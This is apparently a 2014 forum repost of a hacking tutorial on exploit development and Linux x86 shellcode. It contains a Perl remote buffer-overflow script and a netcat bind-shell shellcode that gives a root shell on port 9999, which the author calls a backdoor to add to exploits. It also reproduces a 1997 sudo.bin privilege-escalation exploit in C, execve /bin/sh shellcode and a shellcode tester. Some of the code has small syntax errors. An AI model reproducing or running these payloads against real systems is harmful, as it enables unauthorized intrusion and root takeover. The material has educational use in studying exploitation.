Aerosol Posted December 29, 2014 Report Posted December 29, 2014 Anatomy of Exploit - World of Shellcode ####### Anatomy of Exploit ####### ####### World of Shellcode ####### #/////////////////////////////////////////////////////# #\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\#-----# Introduction On ExploitsNowadays the word exploit is becoming frightened, thousands of peoplesthat are in field of IT should(is a must) know how to make a exploit or evenhow to defend by eexploits.Out there are hundreds of exploitsthat are published in several websites like, etc.Exploitation means using a program routine or a 0day attackto own the OS or crashing the program.Exploiting a program is a cleverway of getting the computer to do what you want it to, even if the currentlyrunning program was designed to prevent that actions.It can do only what you have programmed to do.To get rid of exploit you should learn assembly languageas it is the language wich can talk directly to the kernel, C,c++,Perl, Python programming wich by system calls() we can call the kernel.For me those languagesare enough but since the Computer are in evolution you should not stop learning other programming language.In this paper i wont publish no exploit but to explainthe make of it, the importance of it, and clearing some misunderstanding in our mind,in our brain, so when we read a source code should not become confused.But someone in IRC asked to me how many types of exploit do we have.In reality there are too many types of exploits but i will mention the most importantexploits that are used todays.-----# Remote exploitsExploits can be developed almost at any operation system, but the mostcomfortable OS is Linux and Windows todays.I dont know about Windows cuz we need to install tools like microsoft visual c++,python 2.7 or perl and using them in CMD.But in Linux the gcc, as, ld are the GNU defaults compilers.In Linux you should have learnt sockets to get a routine and get the work done.We have the shell wich is too important to program an exploit.But in this sectionthe purpose is understanding the remote exploits and creating the basic of it.Getting rid of the vulnerability of the program you want or the system you want to get prigileges on the System.Here we go in the Art of Fuzzing wich we send many characters to overflow or to flood and crash the Program.But how do we knowwhat is the address of the eip, to get exploit it in way ret2eip wich meansret2eip=Return the Address of eip.Im explaining the steps:[Step One]Before you develop any exploit, you need to determine whether a vulnerabilityexists in the application. This is where the art of fuzzing comes into play.Since it is remote we can't know the address of register in wich we crashed the program.This step is getting a better fuzzer like Spike and Metasploit.When the fuzzer will be stopped we only get the length of the char's.[Step Two]Get on work with fuzzer.Practice it.Run it.In this step we ran the fuzzerand what we get only the length of the chars but to exploit a program we need eip.Length(X1h21hsdpgm234jlasn356kklasdn432210ifaslkj4120sd .................) etc.We only have the length.[Step Three]We download the program in our system and test it with the fuzzer.As the target is127.0.0.1 we launch a debugger like Ollydbg and we will watch what will happenwhen the fuzz will start.The program will be overflowed and the eip will be on redline.Here we got what we wanted to have.We got the eip, now what.[Step Four]Prepare the shellcode.What is shellcode?-Shellcode is made in assembly languagewith instructions to get the shell with system calls like execve or execl.#########Note ##########Im having in mind that you know the assembly and how to get the shellcode from itwith programs like objdump, gcc etc.[Step Four]Prepare the exploit with the need of.In this section im using a perl scriptto introduce you on exploiting in a basic way.#!/usr/bin/perluse IO::Socket;$header = "TRUN /.:/"; (we put the TRUN header here)$junk = "" x pattern; (Junk or like garbage to overflow) (We can get the pattern with pattern_create tool of metasploit)$eip = pack('v', 0x85f61a2f); (The eip, the most important of exploit)$nop = "\x90" x 20; (NOP=No Operation, Making shellcode nonull)$shellcode = (The shellcode)"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\x51\" +"x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53" +"\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";$socket = IO::Socket::INET->new( (Socket I/O INET FAMILY)Proto => "tcp", (TCP Protocol)PeerAddr => "$ARGV[0]", (First Arg)PeerPort => "$ARGV[1]", (Second Arg));socket->recv($serverdata, 1024); (Data we receive)print $serverdata; (Print that data)$socket->send($header.$junk.$eip.$nop.$shellcode); (Using socket to send them all)[Step Five]We have the exploit, now get on run it.For the exploit above we type the command:root@MINDZSEC~:/root$ ./ target hostAnd if you would be succesful you will get a shell in system,and if you have the shell you can get on exploit kernel to get root privileges. Here we goon Local Exploits wich will be explained now.-----# Local ExploitsThese are the most dificult exploit to develop becauze here you should learn UNIX environmentand syscalls() that are nedded to have a shell on uid.UID stands for user id, and the uid of root will be always 0.To understand this type of exploit you should absolutely knowassembly language to work around with __NR_$syscall.__NR_$syscall are liste in dir of/usr/include/asm-generic/unistd.h where there are all number for each respective syscall().Assembly language is the most used outthere for making shellcode, here we have an program wich is pause.asm----------------------------------------------------------------------------------------------------root@MINDZSEC~:/root$ cat pause.asmsection .text ; Text sectionglobal _start ; _start is global_start: ; _start functionxor ebx, ebx ; Zero out ebx registermov al, 29 ; Insert __NR_pause 11 syscall, see "Appendix A"int 0x80 ; Syscall executeAssemble and Linkroot@MINDZSEC~:/root$ nasm -f elf pause.asm && ld pause.o -o pauseTime to runroot@MINDZSEC~:/root$ ./pause^cIt worked and pause the System, I used CTRL-C to exit from program.Now Get the Opcodesroot@MINDZSEC~:/root$ objdump -d pause.opause.o: file format elf32-i386Disassembly of section .text:00000000 <_start>: 0: 31 db xor %ebx,%ebx 2: b0 1d mov $0x1d,%al 4: cd 80 int $0x80This is a small shellcode but what would you do if it will be long.I used xxd to make the way easier, see Apendix B.root@MINDZSEC~:/root$ ./xxd pause.o"\x31\xdb\xb0\x1d\xcd\x80"Test Shellcoderoot@MINDZSEC~:/root$ ./shtest "\x31\xdb\xb0\x1d\xcd\x80"Shellcode at 0x804b140Registers before call: esp: 0xbfbf0d70, ebp: 0xbfbf0da8 esi: (nil), edi: (nil)----------------------^CHere I used the shellcode tester made by hellman, see Apendix C.We saw that the systempauses and executed the shellcode with success.----------------------------------------------------------------------------------------------------But the purpose of local exploit is to get superuser privileges, by syscall it can be donewhere we use routines to tire up the system and break the linux-so.gate.1 to get uid=0.That is the main purpose of local exploit, since you have exploit a system you need priveleges to conduct actions on this system.They can't be call exploits but a SETUIDprogram to get done with rid of system <-- That what Linus Torvalds told.And it is right since we make a program in assembly language with system callsand we run them to have root shell.The opcodes are the hex codes that make a direct callto the kernel.Thus codes speaks with kernel and tell it to get the root shell or i will overflow you.To take a brief understanding in shellcodes you should readpapers that are published outside on Internet or read Books that are dedicatedon this are of Computer Programming Science.Developing a local exploit we should either know heap overflows wich plays aroundwith programs, buffer overflows wich plays around with buffer register and the stack-based overflows. :Heap Overflows: Read article of W00w00 on heaptut :Buffer Overflows: Read article of Saif El-Sherei :Stack-based buffer overflows: Read article of Aleph1 Smashing the stack you read them you will get a better understand on how the system works and howregister works and how to make them doing what you programmed the program to do.Today all of people are focused on social media and had left the computer science, they are no more dedicated on reading, today lechers or script kiddies reads some paper and copysthe program's to merge into one and they call themselves programmers.No, thats wrong, theywill never become programmers that copies other people's programs to own it.So why i connectedthis sentece on here.All what i want to say that script kiddies wont have ideas on systemsonly if they copy the programs, so to make local exploit we should have an idea and a purpose with lot of imaginary and learn how the system works.In a clever way im going to say that making SHELLCODE and EXPLOIT need IDEAS.Before going to an "real-life local exploit" i will explain and one more shellcode wichuses netcat to get a uid=0 gid=0 groups=0 root shell:----------------------------------------------------------------------------------------------------Netcat Shellcode.asmList the program.root@MINDZSEC:~/root$ cat ntcat.asm;Author Flor Ian MINDZSEC;Contact flor_iano@hotmail.comjmp short todoshellcode:xor eax, eax ; Zero out eaxxor ebx, ebx ; Zero out ebxxor ecx, ecx ; Zero out ecxxor edx, edx ; Zero out edx using the sign bit from eaxmov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4)int 0x80 ; syscall executepop esi ; esi contain the string in dbxor eax, eax ; Zero out eaxmov[esi + 7], al ; null terminate /bin/ncmov[esi + 16], al ; null terminate -lvp90mov[esi + 26], al ; null terminate -e/bin/shmov[esi + 27], esi ; store address of /bin/nc in AAAAlea ebx, [esi + 8] ; load address of -lvp90 into ebxmov[esi +31], ebx ; store address of -lvp90 in BBB taken from ebxlea ebx, [esi + 17] ; load address of -e/bin/sh into ebxmov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebxmov[esi + 39], eax ; Zero out DDDDmov al, 11 ; 11 is execve syscakk numbermov ebx, esi ; store address of /bin/nc lea ecx, [esi + 27] ; load address of ptr to argv[] arraylea edx, [esi + 39] ; envp[] NULLint 0x80 ; syscall execute todo:call shellcodedb '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'; 0123456789012345678901234567890123456789012Assemble and Linkroot@MINDZSEC:~/root$ nasm -f elf ntcat.asm && ld ntcat.o -o ntcatRun to see if it worksroot@MINDZSEC:~/root$ ./ntcatlistening on [any] 9999 ...^c It WorksGet shellcoderoot@MINDZSEC:~/root$ ./xxd ntcat.o"\xeb\x35\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x5e\x31\xc0\x88\x46\x07\x88\x46\x10\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08\x89\x5e\x1f\x8d\x5e\x11\x89\x5e\x23\x89\x46\x27\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x27\xcd\x80\xe8\xc6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x2d\x6c\x76\x70\x39\x39\x39\x39\x23\x2d\x65\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44"Test itroot@MINDZSEC:~/root$ ./shtest "\xeb\x35\x31\xc0\....\\x44\x44\x44\x44"listening on [any] 9999 ...From any machine you can connect to this by nc IP 9999 and get a root shellSee Appendix for a universal Shellcode on getting shell.----------------------------------------------------------------------------------------------------You would ask, Why you use this example when we are talking to local exploits.This program is often called a backdoor and it is used a lot on all programs from big Companies.Shellcodecan have the work done in last two minutes as im saying learn it.I added here this shellcodeso you can add this in your local exploits to get the work done and get a root shell toconduct whatever command you wanted to.Now it time to present you a local exploit as example and explain you the sections of it.I said that i wont give you no exploit in this paper so i will just explain how they worksto you and get a better understand on exploits so you can create them.----------------------------------------------------------------------------------------------------#include <unistd.h> /* Syscall() list */#include <stdio.h> /* I/O */#include <stdlib.h> /* Define macros for several types of data */#include <fcntl.h> /* Perform Operation in files */#include <sys/stat.h> /* defines the structure of the data returned */#define PATH_SUDO "/usr/bin/sudo.bin" /* Macro defined PATH_SUDO */#define BUFFER_SIZE 1024 /* Macro defined Buffer Size */#define DEFAULT_OFFSET 50 /* the amount or distance */u_long get_esp() /* Return Stack pointer */{ __asm__("movl %esp, %eax");}main(int argc, char **argv) /* Main funciton */{ u_char execshell[] = /* Aleph1's /bin/sh shellcode */ "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; /* char-Buff is a pointer cast and = NUll(0) */ unsigned long *addr_ptr = NULL; /* addr_ptr is a pointer unsigned long = Null(0)*/ char *ptr = NULL; /* char-ptr is a pointer cast and = NULL(0) */ int i; /* Declare var integer i; */ int ofs = DEFAULT_OFFSET; /* Declare var ofs wich is equaled to Deffault_offset macro */ buff = malloc(4096); /* Buff pointer is equaled to memory allocation 4096 Bytes */ if(!buff) /* If conditional !buf cant be done */ { printf("can't allocate memory\n");/* Printf String */ exit(0); /* Exit */ } ptr = buff; /* buff is equaled to ptr var pointer, LVALUE=RVALUE */ /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); /* memset function from right to left */ ptr += BUFFER_SIZE-strlen(execshell); /* Fill of ptr */ /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) /* For loop to add shellcode in buffer */ *(ptr++) = execshell[i]; /* Exec */ addr_ptr = (long *)ptr; /* Execshell is = *(ptr) and ptr = addr_ptr */ for(i=0;i < (8/4);i++) /* for loop */ *(addr_ptr++) = get_esp() + ofs; /* addr_ptr++ is equaled to the value of stack pointer and off*/ ptr = (char *)addr_ptr; /* Get return to *ptr */ *ptr = 0; /* Make it zero */ printf("SUDO.BIN exploit coded by _PHANTOM_ 1997\n"); /* Author Information */ setenv("NLSPATH",buff,1); /* Set environmet 1 to buff and buff to NLSPATH */ execl(PATH_SUDO, "sudo.bin","bash", NULL); /* Execl sys call to execute the program */}And we compile it and we get a shell, this is an local exploit of 1997, i took just as a example.So what I told you about shellcodes, they are used at almost of local exploit nowadays.----------------------------------------------------------------------------------------------------A begginer programmer will see this source code and will say that i can't learn them till my end of lifebut it is wrong.That is the first disappointed in our heart.So how to get rid of programming,first we need to be creative and have ideas as i told again. ######NOTE #######Have a learn of kernel syscalls(), their numbers, have a learn of shellcodes andhow to understand them, learn programming languages as much as you can. APPENDIX - Universal Shellcode to get shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~root@MINDZSEC:~/root$ cat getshell.asmsection .text ; Text section global _start ; Define _start function_start: ; _start functionxor eax, eax ; Zero out eax REGisterxor ebx, ebx ; Zero out ebx REGisterxor ecx, ecx ; Zero out ecx REGistercdq ; Zero out edx using the sign bit from eaxpush ecx ; Insert 4 byte null in stackpush 0x68732f6e ; Insert /bin in the stackpush 0x69622f2f ; Insert //sh in the stackmov ebx, esp ; Put /bin//sh in stackpush ecx ; Put 4 Byte in stackpush ebx ; Put ebx in stackmov ecx, esp ; Insert ebx address in ecxxor eax, eax ; Zero out eax registermov al, 11 ; Insert __NR_execve 11 syscallint 0x80 ; Syscall executeroot@MINDZSEC:~/root$ ./xxd getshell.o"\x31\xc0\x31\xdb\x31\xc9\x99\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"That Was all, Thanx for READING.---------------------------------------------------------------------------------------------------- APPENDIX A - SysCall List ~~~~~~~~~~~~~~~~~~~~~~~~~root@MINDZSEC:~/root$ cat syscall.txt00 sys_setup [sys_ni_syscall]01 sys_exit02 sys_fork03 sys_read04 sys_write05 sys_open06 sys_close07 sys_waitpid08 sys_creat09 sys_link10 sys_unlink11 sys_execve12 sys_chdir13 sys_time14 sys_mknod15 sys_chmod16 sys_lchown17 sys_break [sys_ni_syscall]18 sys_oldstat [sys_stat]19 sys_lseek20 sys_getpid21 sys_mount22 sys_umount [sys_oldumount]23 sys_setuid24 sys_getuid25 sys_stime26 sys_ptrace27 sys_alarm28 sys_oldfstat [sys_fstat]29 sys_pause30 sys_utime31 sys_stty [sys_ni_syscall]32 sys_gtty [sys_ni_syscall]33 sys_access34 sys_nice35 sys_ftime [sys_ni_syscall]36 sys_sync37 sys_kill38 sys_rename39 sys_mkdir40 sys_rmdir41 sys_dup42 sys_pipe43 sys_times44 sys_prof [sys_ni_syscall]45 sys_brk46 sys_setgid47 sys_getgid48 sys_signal49 sys_geteuid50 sys_getegid51 sys_acct52 sys_umount2 [sys_umount] (2.2+)53 sys_lock [sys_ni_syscall]54 sys_ioctl55 sys_fcntl56 sys_mpx [sys_ni_syscall]57 sys_setpgid58 sys_ulimit [sys_ni_syscall]59 sys_oldolduname60 sys_umask61 sys_chroot62 sys_ustat63 sys_dup264 sys_getppid65 sys_getpgrp66 sys_setsid67 sys_sigaction68 sys_sgetmask69 sys_ssetmask70 sys_setreuid71 sys_setregid72 sys_sigsuspend73 sys_sigpending74 sys_sethostname75 sys_setrlimit76 sys_getrlimit77 sys_getrusage78 sys_gettimeofday79 sys_settimeofday80 sys_getgroups81 sys_setgroups82 sys_select [old_select]83 sys_symlink84 sys_oldlstat [sys_lstat]85 sys_readlink86 sys_uselib87 sys_swapon88 sys_reboot89 sys_readdir [old_readdir]90 sys_mmap [old_mmap]91 sys_munmap92 sys_truncate93 sys_ftruncate94 sys_fchmod95 sys_fchown96 sys_getpriority97 sys_setpriority98 sys_profil [sys_ni_syscall]99 sys_statfs100 sys_fstatfs101 sys_ioperm102 sys_socketcall103 sys_syslog104 sys_setitimer105 sys_getitimer106 sys_stat [sys_newstat]107 sys_lstat [sys_newlstat]108 sys_fstat [sys_newfstat]109 sys_olduname [sys_uname]110 sys_iopl111 sys_vhangup112 sys_idle113 sys_vm86old114 sys_wait4115 sys_swapoff116 sys_sysinfo117 sys_ipc118 sys_fsync119 sys_sigreturn120 sys_clone121 sys_setdomainname122 sys_uname [sys_newuname]123 sys_modify_ldt124 sys_adjtimex125 sys_mprotect126 sys_sigprocmask127 sys_create_module128 sys_init_module129 sys_delete_module130 sys_get_kernel_syms131 sys_quotactl132 sys_getpgid133 sys_fchdir134 sys_bdflush135 sys_sysfs136 sys_personality137 sys_afs_syscall [sys_ni_syscall]138 sys_setfsuid139 sys_setfsgid140 sys__llseek [sys_lseek]141 sys_getdents142 sys__newselect [sys_select]143 sys_flock144 sys_msync145 sys_readv146 sys_writev147 sys_getsid148 sys_fdatasync149 sys__sysctl [sys_sysctl]150 sys_mlock151 sys_munlock152 sys_mlockall153 sys_munlockall154 sys_sched_setparam155 sys_sched_getparam156 sys_sched_setscheduler157 sys_sched_getscheduler158 sys_sched_yield159 sys_sched_get_priority_max160 sys_sched_get_priority_min161 sys_sched_rr_get_interval162 sys_nanosleep163 sys_mremap164 sys_setresuid (2.2+)165 sys_getresuid (2.2+)166 sys_vm86167 sys_query_module (2.2+)168 sys_poll (2.2+)169 sys_nfsservctl (2.2+)170 sys_setresgid (2.2+)171 sys_getresgid (2.2+)172 sys_prctl (2.2+)173 sys_rt_sigreturn (2.2+)174 sys_rt_sigaction (2.2+)175 sys_rt_sigprocmask (2.2+)176 sys_rt_sigpending (2.2+)177 sys_rt_sigtimedwait (2.2+)178 sys_rt_sigqueueinfo (2.2+)179 sys_rt_sigsuspend (2.2+)180 sys_pread (2.2+)181 sys_pwrite (2.2+)182 sys_chown (2.2+)183 sys_getcwd (2.2+)184 sys_capget (2.2+)185 sys_capset (2.2+)186 sys_sigaltstack (2.2+)187 sys_sendfile (2.2+)188 sys_getpmsg [sys_ni_syscall]189 sys_putpmsg [sys_ni_syscall]190 sys_vfork (2.2+)---------------------------------------------------------------------------------------------------- APPENDIX B - XXD Program ~~~~~~~~~~~~~~~~~~~~~~~~root@MINDZSEC:~/root$ cat xxd#!/bin/bashif [ $# -ne 1 ]then printf "\n\tUsage: $0 filename.o\n\n" exitfifilename=`echo $1 | sed s/"\.o$"//`rm -f $filename.shellcodeobjdump -d $filename.o | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'echo---------------------------------------------------------------------------------------------------- APPENDIX C - Shtester Program by hellman ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~I added the program here not to get a long paper, but i added for you in case that the authorwill erase it or the website will be shutdownroot@MINDZSE:~/root$ cat shtest.c#include <stdio.h>#include <stdlib.h>#include <string.h>#include <signal.h>#include <ctype.h>#include <unistd.h>#include <fcntl.h>#include <sys/mman.h>#include <sys/types.h> /* See NOTES */#include <sys/wait.h>#include <sys/socket.h>/*------------------------------------------ Shellcode testing program Usage: shtest [-s socked_fd_no] {-f file | $'\xeb\xfe' | '\xb8\x39\x05\x00\x00\xc3'} Usage example: $ shtest $'\xeb\xfe' # raw shellcode $ shtest '\xb8\x39\x05\x00\x00\xc3' # escaped shellcode $ shtest -f # shellcode from file $ shtest -f <(python # test generated payload $ shtest -s 5 -f # create socket at fd=5 # Allows to test staged shellcodes # Flow is redirected like this: STDIN -> SOCKET -> STDOUT Compiling: gcc -Wall shtest.c -o shtest Author: hellman (*/char buf[4096];int pid1, pid2;int sock;int ready;void usage(char * err);int main(int argc, char **argv);void load_from_file(char *fname);void copy_from_argument(char *arg);void escape_error();int create_sock();void run_reader(int);void run_writer(int);void set_ready(int sig);void run_shellcode(void *sc_ptr);void usage(char * err) { printf(" Shellcode testing program\n\ Usage:\n\ shtest {-f file | $'\\xeb\\xfe' | '\\xb8\\x39\\x05\\x00\\x00\\xc3'}\n\ Usage example:\n\ $ shtest $'\\xeb\\xfe' # raw shellcode\n\ $ shtest '\\xb8\\x39\\x05\\x00\\x00\\xc3' # escaped shellcode\n\ $ shtest -f # shellcode from file\n\ $ shtest -f <(python # test generated payload\n\ $ shtest -s 5 -f # create socket at fd=5 (STDIN <- SOCKET -> STDOUT)\n\ # Allows to test staged shellcodes\ # Flow is redirected like this: STDIN -> SOCKET -> STDOUT\ Compiling:\n\ gcc -Wall shtest.c -o shtest\n\ Author: hellman (\n"); if (err) printf("\nerr: %s\n", err); exit(1);}int main(int argc, char **argv) { char * fname = NULL; int c; pid1 = pid2 = -1; sock = -1; while ((c = getopt(argc, argv, "hus:f:")) != -1) { switch (c) { case 'f': fname = optarg; break; case 's': sock = atoi(optarg); if (sock <= 2 || sock > 1024) usage("bad descriptor number for sock"); break; case 'h': case 'u': usage(NULL); default: usage("unknown argument"); } } if (argc == 1) usage(NULL); if (optind < argc && fname) usage("can't load shellcode both from argument and file"); if (!(optind < argc) && !fname) usage("please provide shellcode via either argument or file"); if (optind < argc) { copy_from_argument(argv[optind]); } else { load_from_file(fname); } //create socket if needed if (sock != -1) { int created_sock = create_sock(sock); printf("Created socket %d\n", created_sock); } run_shellcode(buf); return 100;}void load_from_file(char *fname) { FILE * fd = fopen(fname, "r"); if (!fd) { perror("fopen"); exit(100); } int c = fread(buf, 1, 4096, fd); printf("Read %d bytes from '%s'\n", c, fname); fclose(fd);}void copy_from_argument(char *arg) { //try to translate from escapes ( \xc3 ) bzero(buf, sizeof(buf)); strncpy(buf, arg, sizeof(buf)); int i; char *p1 = buf; char *p2 = buf; char *end = p1 + strlen(p1); while (p1 < end) { i = sscanf(p1, "\\x%02x", (unsigned int *)p2); if (i != 1) { if (p2 == p1) break; else escape_error(); } p1 += 4; p2 += 1; }}void escape_error() { printf("Shellcode is incorrectly escaped!\n"); exit(1);}int create_sock() { int fds[2]; int sock2; int result = socketpair(AF_UNIX, SOCK_STREAM, 0, fds); if (result == -1) { perror("socket"); exit(101); } if (sock == fds[0]) { sock2 = fds[1]; } else if (sock == fds[1]) { sock2 = fds[0]; } else { dup2(fds[0], sock); close(fds[0]); sock2 = fds[1]; } ready = 0; signal(SIGUSR1, set_ready); /* writer: stdin -> socket (when SC exits/fails, receives SIGCHLD and exits) \--> main: shellcode (when exits/fails, sends SIGCHLD to writer and closes socket) \--> reader: sock -> stdout (when SC exits/fails, socket is closed and reader exits) main saves pid1 = reader, pid2 = writer to send them SIGUSR1 right before running shellcode */ pid1 = fork(); if (pid1 == 0) { close(sock); run_reader(sock2); } pid2 = fork(); if (pid2 > 0) { // parent - writer signal(SIGCHLD, exit); close(sock); run_writer(sock2); } pid2 = getppid(); close(sock2); return sock;}void run_reader(int fd) { char buf[4096]; int n; while (!ready) { usleep(0.1); } while (1) { n = read(fd, buf, sizeof(buf)); if (n > 0) { printf("RECV %d bytes FROM SOCKET: ", n); fflush(stdout); write(1, buf, n); } else { exit(0); } }}void run_writer(int fd) { char buf[4096]; int n; while (!ready) { usleep(0.1); } while (1) { n = read(0, buf, sizeof(buf)); if (n > 0) { printf("SENT %d bytes TO SOCKET\n", n); write(fd, buf, n); } else { shutdown(fd, SHUT_WR); close(fd); wait(&n); exit(0); } }}void set_ready(int sig) { ready = 1;}void run_shellcode(void *sc_ptr) { int ret = 0, status = 0; int (*ptr)(); ptr = sc_ptr; mprotect((void *) ((unsigned int)ptr & 0xfffff000), 4096 * 2, 7); void *esp, *ebp; void *edi, *esi; asm ("movl %%esp, %0;" "movl %%ebp, %1;" :"=r"(esp), "=r"(ebp)); asm ("movl %%esi, %0;" "movl %%edi, %1;" :"=r"(esi), "=r"(edi)); printf("Shellcode at %p\n", ptr); printf("Registers before call:\n"); printf(" esp: %p, ebp: %p\n", esp, ebp); printf(" esi: %p, edi: %p\n", esi, edi); printf("----------------------\n"); if (pid1 > 0) kill(pid1, SIGUSR1); if (pid2 > 0) kill(pid2, SIGUSR1); ret = (*ptr)(); if (sock != -1) close(sock); wait(&status); printf("----------------------\n"); printf("Shellcode returned %d\n", ret); exit(0);}----------------------------------------------------------------------------------------------------EOF -> End of FileFor Any Question Contact to meeee.No Greetings .© Offensive Security 2011Source Quote